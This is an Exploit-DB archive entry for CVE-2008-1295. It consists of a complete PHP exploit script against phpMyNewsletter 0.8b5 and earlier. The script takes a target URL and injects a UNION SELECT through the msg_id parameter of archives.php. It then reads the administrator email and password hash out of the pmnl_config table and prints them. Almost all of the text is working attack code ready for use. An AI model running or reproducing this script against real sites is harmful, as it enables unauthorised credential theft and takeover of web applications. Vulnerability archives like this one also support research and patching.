phpMyNewsletter <= 0.8b5 archives.php msg_id SQL Injection Exploit

2008-03-10T00:00:00
ID EDB-ID:5231
Type exploitdb
Reporter Charles Fol
Modified 2008-03-10T00:00:00

Description

phpMyNewsletter <= 0.8b5 (archives.php msg_id) SQL Injection Exploit. CVE-2008-1295. Webapps exploit for php platform

                                        
                                            #!/usr/bin/php
&lt;?php
/*
 * Name:    PHPMyNewsletter &lt;= 0.8b5 SQL Injection
 * Credits: Charles "real" F. &lt;charlesfol[at]hotmail.fr&gt;
 * Date:    03-10-08
 * Conditions: magic_quotes_gpc=Off
 *
 * This exploit gets admin_pass and admin_email from pmnl_config.
 */
 
print "\n";
print "   PHPMyNewsletter &lt;= 0.8b5 SQL Injection\n";
print "       by real &lt;charlesfol[at]hotmail.fr&gt;\n\n";
 
if($argc&lt;2) die("usage: php phpmynewsletter_sql.php &lt;url&gt;\n");
$url  = $argv[1];

$c = get($url."archives.php?msg_id='%20UNION%20SELECT%201,1,admin_email,admin_pass%20%20FROM%20pmnl_config%2f%2a&list_id=1");

if(preg_match("#&lt;div class='archivetitle'&gt;(.+) - 0000-00-00 00:00:00&lt;/div&gt;#i",$c,$a) && preg_match("#&lt;div class='subcontent'&gt;\t([a-f0-9]{32})&lt;/div&gt;&lt;/div&gt;#i",$c,$b))
{
	print "[*] Mail:\t$a[1]\n";
	print "[*] Password:\t$b[1]\n";
}
else
{
	print "[*] Exploit failed\n";
}

function get($url,$get=1)
{
	$result = '';
	preg_match("#^http://([^/]+)(/.*)$#i",$url,$infos);
	$host = $infos[1];
	$page = $infos[2];
	$fp = fsockopen($host, 80, &$errno, &$errstr, 30);
	
	$req  = "GET $page HTTP/1.1\r\n";
	$req .= "Host: $host\r\n";
	$req .= "User-Agent: Mozilla Firefox\r\n";
	$req .= "Connection: close\r\n\r\n";

	fputs($fp,$req);
	
	if($get) while(!feof($fp)) $result .= fgets($fp,128);
	
	fclose($fp);
	return $result;
}

?&gt;

# milw0rm.com [2008-03-10]